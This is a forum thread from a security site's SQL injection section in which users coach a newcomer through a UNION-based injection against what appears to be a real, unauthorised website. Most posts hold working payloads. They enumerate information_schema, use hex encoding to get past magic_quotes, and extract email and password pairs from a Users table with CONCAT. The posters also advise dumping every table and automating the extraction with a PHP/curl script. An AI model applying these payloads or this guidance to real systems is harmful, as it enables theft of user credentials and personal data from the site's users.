 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Sat Feb 09, 2008 5:49 pm |
 |
|
| gtal3x |
| Active user |
 |
|
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
 |
|
 |
|
| thats exacly wat u need, with my code u found that the column name is "User", u can go ferther by limit+2,1... etc, or u can start finding tables with the same comand (cahnge columns for tables) and the 0x257573657225 stands for a hex encoding wich is %user% |
|
|
|
|
| Posted: Sat Feb 09, 2008 5:55 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Did you remember to use single quotes? Because without single quotes mysql engine will think, that it's column name!
Try something like this:
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME='here the table name'+AND+TABLE_SCHEMA='here the db name'+LIMIT+0,1/*
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 5:57 pm |
|
|
| gtal3x |
| Active user |
|
|
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
|
|
|
|
or just try this and tell me what u see...
+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,email,7,8,9,0,1,2+from+User+limit+1,1/* |
|
|
|
|
| Posted: Sat Feb 09, 2008 6:06 pm |
|
|
| Panic_Mode |
| Active user |
 |
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
@gtal3x
Like I told before although i receive the Users output I can't go ferther with Limit. I always get "Users" output.
Also when i try to get some info from users it says that it does not exist :p
@waraxe
Yeh I forgot the quotes :p
but now there is an error in syntax
| Code: | | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'table name\' AND TABLE_SCHEMA=\'db name\' LIMIT 0,1/* ORDER BY e.OK DESC, e.recI' at line 1 |
|
|
|
|
|
| Posted: Sat Feb 09, 2008 6:08 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Yes, this is "magic_quotes" effect in php 
Use Hex-encoded strings like "0xaabbccddeeff" ... |
|
|
|
|
| Posted: Sat Feb 09, 2008 6:18 pm |
|
|
| Panic_Mode |
| Active user |
|
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
Yes it just worked 
Now something that came across my mind... Is there a script which can automatically switch the LIMIT nums and copy the output? It's a bit painfull to do it manually 
I think i've got many things to learn from this place |
|
|
|
|
| Posted: Sat Feb 09, 2008 6:28 pm |
|
|
| gtal3x |
| Active user |
|
|
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
|
|
|
|
| i guess u can try to find a perl script that finds the right tables and columns for you, or write it your self, but this is for mysql 4x, in 5x you can always use the information schem to find excaly what u r lookin for, use where+table_name+like+0xHEX/* |
|
|
|
|
| Posted: Sat Feb 09, 2008 6:40 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Panic_Mode wrote: | Yes it just worked
Now something that came across my mind... Is there a script which can automatically switch the LIMIT nums and copy the output? It's a bit painfull to do it manually
I think i've got many things to learn from this place |
My favourite is Php, so usually i', writing php script for this.
Do you have php on your home PC? I can post here some simple script, which can be modified as needes. Interested? |
|
|
|
|
|
 |
|
 |
| Posted: Sat Feb 09, 2008 6:42 pm |
|
|
| Panic_Mode |
| Active user |
|
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
| waraxe wrote: | | Panic_Mode wrote: | Yes it just worked
Now something that came across my mind... Is there a script which can automatically switch the LIMIT nums and copy the output? It's a bit painfull to do it manually
I think i've got many things to learn from this place |
My favourite is Php, so usually i', writing php script for this.
Do you have php on your home PC? I can post here some simple script, which can be modified as needes. Interested? |
Of course! |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 6:42 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| gtal3x wrote: | | i guess u can try to find a perl script that finds the right tables and columns for you, or write it your self, but this is for mysql 4x, in 5x you can always use the information schem to find excaly what u r lookin for, use where+table_name+like+0xHEX/* |
Still, it's usually good idea to dump all tables and colums - becasue there can be surprises - i mean, data you have not been searching for, but still interesting |
|
|
|
|
| Posted: Sat Feb 09, 2008 6:44 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| OK, i have to offline right now, but i will be back soon and then will post example script. Have you php CLI ready? With Curl? |
|
|
|
|
| Posted: Sat Feb 09, 2008 6:50 pm |
|
|
| Panic_Mode |
| Active user |
|
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
| waraxe wrote: | | OK, i have to offline right now, but i will be back soon and then will post example script. Have you php CLI ready? With Curl? |
I'll set them up
Oh something else...
| Code: | | UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT(mail,0x5e,password)+FROM+table_name+where+column_name=0xblablahex+LIMIT+0,1/* |
I don't get an error but also i don't get an ouput on the page...  |
|
|
|
|
| Posted: Sat Feb 09, 2008 6:58 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Try using LIKE. And LIMIT is maybe not needed here, because you expect single row?
Try this:
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT(mail,0x5e,password)+FROM+table_name+where+column_name+LIKE+0xblablahex/*
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 7:02 pm |
|
|
| gtal3x |
| Active user |
|
|
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
|
|
|
|
why not do it str8?
| Code: | | UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT_WS(CHAR(58),mail,password)+FROM+Users/* |
btw i think the best thing to do is just to dump the sql file, so u have all the emails and password, i guess u r lucky the passwords are plain text? |
|
|
|
|
| Posted: Sat Feb 09, 2008 7:06 pm |
|
|
| Panic_Mode |
| Active user |
|
|
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
| waraxe wrote: | Try using LIKE. And LIMIT is maybe not needed here, because you expect single row?
Try this:
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT(mail,0x5e,password)+FROM+table_name+where+column_name+LIKE+0xblablahex/*
|
|
Once more you were right
Thank you both guys (waraxe, gtal3x) |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 3
Goto page Previous1, 2, 3Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 100
Members: 0
Total: 100
